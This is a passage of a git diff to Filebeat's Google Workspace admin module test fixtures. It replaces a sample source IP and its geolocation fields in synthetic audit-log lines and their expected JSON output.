+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UNASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -400,27 +372,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3157,
+        "log.offset": 3150,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log
index c3166fb87d2b..9136bf3801f7 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log
@@ -1,3 +1,3 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOCS_SETTINGS","name":"TRANSFER_DOCUMENT_OWNERSHIP","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOCS_SETTINGS","name":"DRIVE_DATA_RESTORE","parameters":[{"name":"BEGIN_DATE_TIME","value":"2002-10-02T12:00:00Z"},{"name":"END_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOCS_SETTINGS","name":"CHANGE_DOCS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOCS_SETTINGS","name":"TRANSFER_DOCUMENT_OWNERSHIP","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOCS_SETTINGS","name":"DRIVE_DATA_RESTORE","parameters":[{"name":"BEGIN_DATE_TIME","value":"2002-10-02T12:00:00Z"},{"name":"END_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOCS_SETTINGS","name":"CHANGE_DOCS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json
index 97f5e3b6b83e..75ac5bf0a4dc 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"TRANSFER_DOCUMENT_OWNERSHIP\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"TRANSFER_DOCUMENT_OWNERSHIP\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -25,24 +25,20 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -68,7 +64,7 @@
         "event.end": "2002-10-02T15:00:00.000Z",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"DRIVE_DATA_RESTORE\",\"parameters\":[{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"DRIVE_DATA_RESTORE\",\"parameters\":[{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.start": "2002-10-02T12:00:00.000Z",
         "event.type": [
@@ -81,27 +77,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 471,
+        "log.offset": 470,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -126,7 +118,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"CHANGE_DOCS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"CHANGE_DOCS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -145,26 +137,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 967,
+        "log.offset": 965,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log
index b452d9e8d945..6bb8cb627570 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log
@@ -1,85 +1,85 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ACCOUNT_AUTO_RENEWAL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"NON_AUTO_RENEWAL"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_ENABLED","value":"app enabled"},{"name":"APPLICATION_NAME","value":"app name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION_TO_WHITELIST","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_NAME","value":"app name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ADVERTISEMENT_OPTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ALERT_CRITERIA","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_RECEIVERS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_ALERT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_STATUS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"DOMAIN_VERIFICATION_METHOD","value":"ANALYTICS"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_API_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"true"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"AUTHORIZE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"},{"name":"API_SCOPES","multiValue":["a","b"]}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHROME_LICENSES_REDEEMED","parameters":[{"name":"APP_LICENSES_ORDER_NUMBER","value":"abcd123"},{"name":"APPLICATION_NAME","value":"app name"},{"name":"CHROME_NUM_LICENSES_PURCHASED","intValue":1}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_AUTO_ADD_NEW_SERVICE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PRIMARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_WHITELIST_SETTING","parameters":[{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"COMMUNICATION_PREFERENCES_SETTING_CHANGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CONFLICT_ACCOUNT_ACTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_FEEDBACK_SOLICITATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_CONTACT_SHARING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
